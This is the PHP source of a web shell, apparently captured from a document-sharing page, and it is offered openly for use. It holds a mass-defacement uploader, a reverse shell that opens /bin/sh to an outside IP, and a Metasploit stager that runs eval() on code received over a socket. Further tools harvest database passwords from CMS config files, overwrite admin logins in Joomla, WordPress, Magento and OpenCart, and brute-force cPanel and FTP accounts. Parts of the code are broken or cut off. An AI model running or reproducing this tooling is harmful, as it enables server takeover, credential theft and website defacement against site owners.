fputs($ss, $decode_isi);
echo "[+] <a href='$korban' target='_blank'>$korban</a> <br>";
echo "Done index.php<br>";
$url_mkfile = "$korban?cmd=mkfile&name=$global&target=l1_Lw";
$post1 = array(
"target" => "l1_$encode",
"content" => "$decode_isi",);
$post2 = array( "upload[]" => "@$global",);
$output_mkfile = ngirim("$korban", $post1);
$upload_ah = ngirim("$korban?cmd=upload", $post2);
}
}
?>
<input type="submit" name="s" value="N45HT.php">
</form>
<?php
$targets = explode("\r\n", $_POST['targets']);
if($_POST['s']) {
foreach($targets as $korba) {
$globa = "N45HT.php";
$isi_nama =
"PGh0bWwgbGFuZz0iZW4tVVMiPjxoZWFkPjx0aXRsZT5OdXNhbnRhcmEgNDUgSGFja2VyIFRlYW08L3RpdG
xlPjwhLS0tQnkgTXIueDB4IERvbm50IENvcGFzIEN1ayAtLT4NCjxtZXRhIHByb3BlcnR5PSJvZzp0aXRsZ
SIgY29udGVudD0iV2FzIEhlcmUiPg0KPG1ldGEgcHJvcGVydHk9Im9nOmRlc2NyaXB0aW9uIiBjb250ZW50
PSJ+IE40NUhUIH4iPg0KPG1ldGEgcHJvcGVydHk9Im9nOmF1dGhvciIgY29udGVudD0iTXIueDB4Ij4NCg0
KPG1ldGEgY2hhcnNldD0iVVRGLTgiPg0KDQoNCjxzdHlsZT5ib2R5e2JhY2tncm91bmQ6IzAwMDtmb250LW
ZhbWlseTpDb3VyaWVyIG5ldzt0ZXh0LWFsaWduOmNlbnRlcjtjb2xvcjojZmZmO31wcmV7bWFyZ2luLXRvc
DoxJTsNCiAgICAgICBjdXJzb3I6IHVybChodHRwOi8vY3VyLmN1cnNvcnMtNHUubmV0L2N1cnNvcnMvY3Vy
LTkvY3VyODYyLmFuaSksIHVybChodHRwOi8vY3VyLmN1cnNvcnMtNHUubmV0L2N1cnNvcnMvY3VyLTkvY3V
yODYyLnBuZyksIHByb2dyZXNzICFpbXBvcnRhbnQ7DQp9DQpmb250IHtib3gtc2hhZG93OiAwIDAgMTBweC
BkYXJrYmx1ZTt9DQoNCiA8L3N0eWxlPg0KDQoNCjwvaGVhZD48Ym9keSBvbmNvbnRleHRtZW51PSJyZXR1c
m4gZmFsc2UiIG9ua2V5ZG93bj0icmV0dXJuIGZhbHNlIiBvbm1vdXNlZG93bj0icmV0dXJuIGZhbHNlIj48
YnI+PGJyPjxicj4NCjxjZW50ZXI+PGltZyBzdHlsZT0id2lkdGg6MzIwcHg7IiBzcmM9Imh0dHBzOi8vMi5
icC5ibG9nc3BvdC5jb20vLW8wR2RNeUVoOWx3L1dHX2hWVFdaUU1JL0FBQUFBQUFBQXdVL0M4VkF0aXFaU2
5FbzZPX2s2dkg4WnJZTHByRTA3czBMZ0NMY0IvczE2MDAvTjQ1SFQlMkIlMjUyODIlMjUyOS5wbmciPjwvY
2VudGVyPg0KICAgICAgDQogICAgICANCgkgIDxicj4NCiAgICAgIDxicj4NCiAgICANCgkgIA0KICAgICAg
ICAgPG1hcnF1ZWUgYmVoYXZpb3I9ImFsdGVybmF0ZSIgc2Nyb2xsYW1vdW50PSIzIiB3aWR0aD0iNDUlIiB
zdHlsZT0id2lkdGg6IDQ1JTsiPkRpc2NvdmVyaW5nIEFuZCBFeHBsb2l0aW5nIFNlY3VyaXR5IEZsYXdzPC
9tYXJxdWVlPg0KPHByZT48Zm9udCBjb2xvcj0icmVkIj5bPC9mb250Pk40NUhUIE9mZmljaWFsIE5pY2s8Z
m9udCBjb2xvcj0icmVkIj5dPC9mb250Pg0KDQp8IElkYVJhaG1hIHwgS2lsbCBNZSB8IEJyb2tlbiBBbmdl
bCB8IFNoaW5DaGFuIHwgLi9Nci5CbGFuazAwNyB8IFNDWVRIRTQwNF9MT0wgfCBQRVRSMDNYIHwgUjN4WW4
tMDFgIHwgSjROQzBLIHwgRlJVXzQwMyB8IGthc2lhbiB8IE1SWSANCnwgc2lsdW1hbi5uYW5hcyB8IC9tci
5BbmRybzBURkwgfCBUcmlwbGUgQSB8IE5vb2JfT3JiIHwgQk9DQUggS1JJTUlOQUwgfCByMDA3QHVua24wd
24gfCBNclg0MDQgfCBNaXN0ZXJzJCB8IEFic1RyYXggfCBJbmlzaWFsLUMgDQp8IHVzZXI5OCB8IEplcnVr
SUQyNyB8IFRpbmFtYVRfVGVhTSB8IE1yLiBTM1BVTDBIIHwgTVIuVTEzIHwgRGFya19PcmFjbGUgfCBNci4
geDB4IHwgTXIuQ3I0YnMgfCBTZXh5R2lyIHwgQmFuZ0RlYmJ6IHwgQ0tNXzUwMSB8IEFuZCBBbGwgVGVhbS
BONDVIVCB8DQogPC9wcmU+DQoJICAgICAgICANCgkgPGJyPiAJICANCjxmb250IGNvbG9yPSJ3aGl0ZSIgc
2l6ZT0iMiI+VGhhbmtzIFRvKiA6IE40NUhUICwgU2hpbkNoYW4gLFBFVFIwM1ggLCBSaW50byBBUiA8L2Zv
bnQ+DQo8YnI+Izw/cGhwDQokaXAgPSAkX1NFUlZFUlsnUkVNT1RFX0FERFInXTsNCmVjaG8gIiBZb3VyIEl
QOiAkaXAgIjsNCj8+DQogICANCiAgICAgDQogPC9ib2R5PjwvaHRtbD4=";
$decode_isi = base64_decode($isi_nama);
$encode = base64_encode($globa);
$ss = fopen($globa,"w");
fputs($ss, $decode_isi);
echo "[+] <a href='$korban' targets='_blank'>$korba</a> <br>";
echo "Done N45HT.php<br>";
$url_mkfil = "$korba?cmd=mkfile&name=$globa&targets=l1_Lw";
$post1 = array(
"targets" => "l1_$encode",
"content" => "$decode_isi",);
$post2 = array( "upload[]" => "@$globa",);
$output_mkfil = ngirim("$korban", $post1);
$upload_as = ngirim("$korban?cmd=upload", $post2);
}
}
} elseif($_GET['do'] == 'tool') {
error_reporting(0);
function ss($t){if (!get_magic_quotes_gpc()) return trim(urldecode($t));return
trim(urldecode(stripslashes($t)));}
$s_my_ip = gethostbyname($_SERVER['HTTP_HOST']);$rsport = "443";$rsportb4 =
$rsport;$rstarget4 = $s_my_ip;$s_result = "<br><br><br><center><table><div
class='mybox' align='center'><td><h2>Reverse shell ( php )</h2><form method='post'
actions='?y=<?php echo $pwd;?>&x='tool'><table class='tabnet'><tr><td
style='width:110px;'>Your IP</td><td><input style='width:100%;' class='inputz'
type='text' name='rstarget4' value='".$rstarget4."'
/></td></tr><tr><td>Port</td><td><input style='width:100%;' class='inputz'
type='text' name='sqlportb4' value='".$rsportb4."' /></td></tr></table><input
type='submit' name='xback_php' class='inputzbut' value='connect'
style='width:120px;height:30px;margin:10px 2px 0 2px;' /><input type='hidden'
name='d' value='".$pwd."' /></form></td><td><hr color='blue'><td><td><form
method='POST'><table class='tabnet'><h2>Metasploit Connection </h2><tr><td
style='width:110px;'>Your IP</td><td><input style='width:100%;' class='inputz'
type='text' size='40' name='yip' value='".$my_ip."'
/></td></tr><tr><td>Port</td><td><input style='width:100%;' class='inputz'
type='text' size='5' name='yport' value='443' /></td></tr></table><input
class='inputzbut' type='submit' value='Connect' name='metaConnect'
style='width:120px;height:30px;margin:10px 2px 0
2px;'></form></td></div></center></table><br><br />";
echo $s_result;
if($_POST['metaConnect']){$ipaddr = $_POST['yip'];$port = $_POST['yport'];if ($ip
== "" && $port == ""){echo "fill in the blanks";}else {if (FALSE !==
strpos($ipaddr, ":")) {$ipaddr = "[". $ipaddr ."]";}if
(is_callable('stream_socket_client')){$msgsock = stream_socket_client("tcp://
{$ipaddr}:{$port}");if (!$msgsock){die();}$msgsock_type = 'stream';}elseif
(is_callable('fsockopen')){$msgsock = fsockopen($ipaddr,$port);if (!$msgsock)
{die(); }$msgsock_type = 'stream';}elseif (is_callable('socket_create')){$msgsock =
socket_create(AF_INET, SOCK_STREAM, SOL_TCP);$res = socket_connect($msgsock,
$ipaddr, $port);if (!$res) {die(); }$msgsock_type = 'socket';}else {die();}switch
($msgsock_type){case 'stream': $len = fread($msgsock, 4); break;case 'socket': $len
= socket_read($msgsock, 4); break;}if (!$len) {die();}$a = unpack("Nlen", $len);
$len = $a['len'];$buffer = '';while (strlen($buffer) < $len){switch ($msgsock_type)
{case 'stream': $buffer .= fread($msgsock, $len-strlen($buffer)); break;case
'socket': $buffer .= socket_read($msgsock, $len-
strlen($buffer));break;}}eval($buffer);echo "[*] Connection Terminated";die();}}
if(isset($_REQUEST['sqlportb4'])) $rsportb4 = ss($_REQUEST['sqlportb4']);
if(isset($_REQUEST['rstarget4'])) $rstarget4 = ss($_REQUEST['rstarget4']);
if ($_POST['xback_php']) {$ip = $rstarget4;$port = $rsportb4;$chunk_size =
1337;$write_a = null;$error_a = null;$shell = '/bin/sh';$daemon = 0;$debug =
0;if(function_exists('pcntl_fork')){$pid = pcntl_fork();
if ($pid == -1) exit(1);if ($pid) exit(0);if (posix_setsid() == -1) exit(1);$daemon
= 1;}
umask(0);$sock = fsockopen($ip, $port, $errno, $errstr, 30);if(!$sock) exit(1);
$descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 =>
array("pipe", "w"));
$process = proc_open($shell, $descriptorspec, $pipes);
if(!is_resource($process)) exit(1);
stream_set_blocking($pipes[0], 0);
stream_set_blocking($sock, 0);
while(1){if(feof($sock)) break;if(feof($pipes[1])) break;$read_a = array($sock,
$pipes[1], $pipes[2]);$num_changed_sockets = stream_select($read_a, $write_a,
$error_a, null);
if(in_array($sock, $read_a)){$input = fread($sock, $chunk_size);fwrite($pipes[0],
$input);}
if(in_array($pipes[1], $read_a)){$input = fread($pipes[1],
$chunk_size);fwrite($sock, $input);}
if(in_array($pipes[2], $read_a)){$input = fread($pipes[2],
$chunk_size);fwrite($sock,
$input);}}fclose($sock);fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_
close($process);$rsres = " ";$s_result .= $rsres;}
} elseif($_GET['do'] == 'auto_edit_user') {
if($_POST['hajar']) {
if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
echo "username atau password harus lebih dari 6 karakter";
} else {
$user_baru = $_POST['user_baru'];
$pass_baru = md5($_POST['pass_baru']);
$conf = $_POST['config_dir'];
$scan_conf = scandir($conf);
foreach($scan_conf as $file_conf) {
if(!is_file("$conf/$file_conf")) continue;
$config = file_get_contents("$conf/$file_conf");
if(preg_match("/JConfig|joomla/",$config)) {
$dbhost = ambilkata($config,"host = '","'");
$dbuser = ambilkata($config,"user = '","'");
$dbpass = ambilkata($config,"password = '","'");
$dbname = ambilkata($config,"db = '","'");
$dbprefix = ambilkata($config,"dbprefix = '","'");
$prefix = $dbprefix."users";
$conn = mysql_connect($dbhost,$dbuser,$dbpass);
$db = mysql_select_db($dbname);
$q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
$result = mysql_fetch_array($q);
$id = $result['id'];
$site = ambilkata($config,"sitename = '","'");
$update = mysql_query("UPDATE $prefix SET
username='$user_baru',password='$pass_baru' WHERE id='$id'");
echo "Config => ".$file_conf."<br>";
echo "CMS => Joomla<br>";
if($site == '') {
echo "Sitename => <font color=red>error, gabisa ambil nama
domain nya</font><br>";
} else {
echo "Sitename => $site<br>";
}
if(!$update OR !$conn OR !$db) {
echo "Status => <font
color=red>".mysql_error()."</font><br><br>";
} else {
echo "Status => <font color=blue>sukses edit user, silakan
login dengan user & pass yang baru.</font><br><br>";
}
mysql_close($conn);
} elseif(preg_match("/WordPress/",$config)) {
$dbhost = ambilkata($config,"DB_HOST', '","'");
$dbuser = ambilkata($config,"DB_USER', '","'");
$dbpass = ambilkata($config,"DB_PASSWORD', '","'");
$dbname = ambilkata($config,"DB_NAME', '","'");
$dbprefix = ambilkata($config,"table_prefix = '","'");
$prefix = $dbprefix."users";
$option = $dbprefix."options";
$q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
$id = $result[ID];
$q2 = mysql_query("SELECT * FROM $option ORDER BY option_id
ASC");
$result2 = mysql_fetch_array($q2);
$target = $result2[option_value];
if($target == '') {
$url_target = "Login => <font color=red>error, gabisa ambil
nama domain nyaa</font><br>";
} else {
$url_target = "Login => <a href='$target/wp-login.php'
target='_blank'><u>$target/wp-login.php</u></a><br>";
}
user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
echo "CMS => Wordpress<br>";
echo $url_target;
} else {
}
mysql_close($conn);
} elseif(preg_match("/Magento|Mage_Core/",$config)) {
$dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
$dbuser = ambilkata($config,"<username><!
[CDATA[","]]></username>");
$dbpass = ambilkata($config,"<password><!
[CDATA[","]]></password>");
$dbname = ambilkata($config,"<dbname><!
[CDATA[","]]></dbname>");
$dbprefix = ambilkata($config,"<table_prefix><!
[CDATA[","]]></table_prefix>");
$prefix = $dbprefix."admin_user";
$option = $dbprefix."core_config_data";
$q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
$id = $result[user_id];
$q2 = mysql_query("SELECT * FROM $option WHERE
path='web/secure/base_url'");
$result2 = mysql_fetch_array($q2);
$target = $result2[value];
if($target == '') {
} else {
$url_target = "Login => <a href='$target/admin/'
target='_blank'><u>$target/admin/</u></a><br>";
}
username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
echo "CMS => Magento<br>";
echo $url_target;
} else {
}
mysql_close($conn);
} elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|
DIR_SYSTEM/",$config)) {
$dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
$dbuser = ambilkata($config,"'DB_USERNAME', '","'");
$dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
$dbname = ambilkata($config,"'DB_DATABASE', '","'");
$dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
$prefix = $dbprefix."user";
$q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
$id = $result[user_id];
$target = ambilkata($config,"HTTP_SERVER', '","'");
if($target == '') {
} else {
$url_target = "Login => <a href='$target'
target='_blank'><u>$target</u></a><br>";
}
username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
echo "CMS => OpenCart<br>";
echo $url_target;
} else {
}
mysql_close($conn);
} elseif(preg_match("/panggil fungsi validasi xss dan injection/",
$config)) {
$dbhost = ambilkata($config,'server = "','"');
$dbuser = ambilkata($config,'username = "','"');
$dbpass = ambilkata($config,'password = "','"');
$dbname = ambilkata($config,'database = "','"');
$prefix = "users";
$option = "identitas";
$q = mysql_query("SELECT * FROM $option ORDER BY id_identitas
ASC");
$target = $result[alamat_website];
if($target == '') {
$target2 = $result[url];
if($target2 == '') {
$url_target2 = "Login => <font color=red>error, gabisa
ambil nama domain nyaa</font><br>";
} else {
$cek_login3 = file_get_contents("$target2/adminweb/");
$cek_login4 =
file_get_contents("$target2/lokomedia/adminweb/");
if(preg_match("/CMS Lokomedia|Administrator/",
$cek_login3)) {
$url_target2 = "Login => <a
href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
} elseif(preg_match("/CMS Lokomedia|Lokomedia/",
$cek_login4)) {
$url_target2 = "Login => <a
href='$target2/lokomedia/adminweb'
target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
} else {
$url_target2 = "Login => <a href='$target2'
target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya
dimana :p</font> ]<br>";
}
}
} else {
$cek_login = file_get_contents("$target/adminweb/");
$cek_login2 =
file_get_contents("$target/lokomedia/adminweb/");
if(preg_match("/CMS Lokomedia|Administrator/", $cek_login))
{
$url_target = "Login => <a href='$target/adminweb'
target='_blank'><u>$target/adminweb</u></a><br>";
} elseif(preg_match("/CMS Lokomedia|Lokomedia/",
$cek_login2)) {
$url_target = "Login => <a
href='$target/lokomedia/adminweb'
target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
} else {
$url_target = "Login => <a href='$target'
target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya
dimana :p</font> ]<br>";
}
}
username='$user_baru',password='$pass_baru' WHERE level='admin'");
echo "CMS => Lokomedia<br>";
if(preg_match('/error, gabisa ambil nama domain nya/',
$url_target)) {
echo $url_target2;
} else {
echo $url_target;
}
} else {
}
mysql_close($conn);
}
}
}
} else {
echo "<center>
<h1>Auto Edit User Config</h1>
<form method='post'>
DIR Config: <br>
<input type='text' size='50' name='config_dir' value='$dir'><br><br>
Set User & Pass: <br>
<input type='text' name='user_baru' value='N45HT'
placeholder='user_baru'><br>
<input type='text' name='pass_baru' value='N45HT'
placeholder='pass_baru'><br>
<input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
</form>
<span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u>
( ex: /home/user/public_html/nama_folder_config )</span><br>
";
}
} elseif($_GET['do'] == 'cpanel') {
if($_POST['crack']) {
$usercp = explode("\r\n", $_POST['user_cp']);
$passcp = explode("\r\n", $_POST['pass_cp']);
$i = 0;
foreach($usercp as $ucp) {
foreach($passcp as $pcp) {
if(@mysql_connect('localhost', $ucp, $pcp)) {
if($_SESSION[$ucp] && $_SESSION[$pcp]) {
} else {
$_SESSION[$ucp] = "1";
$_SESSION[$pcp] = "1";
if($ucp == '' || $pcp == '') {
} else {
$i++;
if(function_exists('posix_getpwuid')) {
$domain_cp = file_get_contents("/etc/named.conf");
if($domain_cp == '') {
$dom = "<font color=red>gabisa ambil nama
domain nya</font>";
} else {
preg_match_all("#/var/named/(.*?).db#",
$domain_cp, $domains_cp);
foreach($domains_cp[1] as $dj) {
$user_cp_url =
posix_getpwuid(@fileowner("/etc/valiases/$dj"));
$user_cp_url = $user_cp_url['name'];
if($user_cp_url == $ucp) {
$dom = "<a href='http://$dj/'
target='_blank'><font color=blue>$dj</font></a>";
break;
}
}
}
} else {
$dom = "<font color=red>function is Disable by
system</font>";
}
echo "username (<font color=blue>$ucp</font>) password
(<font color=blue>$pcp</font>) domain ($dom)<br>";
}
}
}
}
}
if($i == 0) {
} else {
echo "<br>sukses nyolong ".$i." Cpanel by <font color=blue>LugiX Shell
Code.</font>";
}
} else {
echo "<center>
<form method='post'>
USER: <br>
<textarea style='width: 450px; height: 150px;' name='user_cp'>";
$_usercp = fopen("/etc/passwd","r");
while($getu = fgets($_usercp)) {
if($getu == '' || !$_usercp) {
} else {
preg_match_all("/(.*?):x:/", $getu, $u);
foreach($u[1] as $user_cp) {
if(is_dir("/home/$user_cp/public_html")) {
echo "$user_cp\n";
}
}
}
}
echo "</textarea><br>
PASS: <br>
<textarea style='width: 450px; height: 200px;' name='pass_cp'>";
function cp_pass($dir) {
$pass = "";
if(!is_file("$dir/$dirb")) continue;
$ambil = file_get_contents("$dir/$dirb");
if(preg_match("/WordPress/", $ambil)) {
$pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
} elseif(preg_match("/JConfig|joomla/", $ambil)) {
$pass .= ambilkata($ambil,"password = '","'")."\n";
} elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
$pass .= ambilkata($ambil,"<password><!
[CDATA[","]]></password>")."\n";
} elseif(preg_match("/panggil fungsi validasi xss dan injection/",
$ambil)) {
$pass .= ambilkata($ambil,'password = "','"')."\n";
} elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|
DIR_SYSTEM/", $ambil)) {
$pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
} elseif(preg_match("/^[client]$/", $ambil)) {
preg_match("/password=(.*?)/", $ambil, $pass1);
if(preg_match('/"/', $pass1[1])) {
$pass1[1] = str_replace('"', "", $pass1[1]);
$pass .= $pass1[1]."\n";
} else {
$pass .= $pass1[1]."\n";
}
} elseif(preg_match("/cc_encryption_hash/", $ambil)) {
$pass .= ambilkata($ambil,"db_password = '","'")."\n";
}
}
echo $pass;
}
$cp_pass = cp_pass($dir);
echo $cp_pass;
echo "</textarea><br>
<input type='submit' name='crack' style='width: 450px;' value='Crack'>
</form>
<span>NB: CPanel Crack ini sudah auto get password ( pake db password )
maka akan work jika dijalankan di dalam folder <u>config</u> ( ex:
/home/user/public_html/nama_folder_config )</span><br></center>";
}
} elseif($_GET['do'] == 'cpftp_auto') {
if($_POST['crack']) {
$usercp = explode("\r\n", $_POST['user_cp']);
$passcp = explode("\r\n", $_POST['pass_cp']);
$i = 0;
foreach($usercp as $ucp) {
foreach($passcp as $pcp) {
if(@mysql_connect('localhost', $ucp, $pcp)) {
if($_SESSION[$ucp] && $_SESSION[$pcp]) {
} else {
$_SESSION[$ucp] = "1";
$_SESSION[$pcp] = "1";
if($ucp == '' || $pcp == '') {
//
} else {
echo "[+] username (<font color=blue>$ucp</font>)
password (<font color=blue>$pcp</font>)<br>";
$ftp_conn = ftp_connect($ip);
$ftp_login = ftp_login($ftp_conn, $ucp, $pcp);
if((!$ftp_login) || (!$ftp_conn)) {
echo "[+] <font color=red>Login
Gagal</font><br><br>";
} else {
echo "[+] <font color=blue>Login
Sukses</font><br>";
$fi = htmlspecialchars($_POST['file_deface']);
$deface = ftp_put($ftp_conn, "public_html/$fi",
$_POST[…

JKHTML

Transféré par

Informations du document

Titre original

Copyright

Formats disponibles

Partager ce document

Partager ou intégrer le document

Options de partage

Avez-vous trouvé ce document utile ?

Ce contenu est-il inapproprié ?

Droits d'auteur :

Formats disponibles

JKHTML

Transféré par

Droits d'auteur :

Formats disponibles

<?

echo '<center><div id="menu">';

echo "<li> <a href='?'>Home</a> </li>";

<center><font color="gold" size="14" face="arial">Backdoor

$cek = explode('.', $six);

$last=date("M-d-Y H:i", $last_modified);

<table class="me" width="200">

echo '<center><div id="menu" >';

<option value="str">str_rot13 - gzinflate - str_rot13 - base64</option>

echo "<form method='post' target='_blank' action='$url'

foreach ($adminlocales as $admin){

Vous aimerez peut-être aussi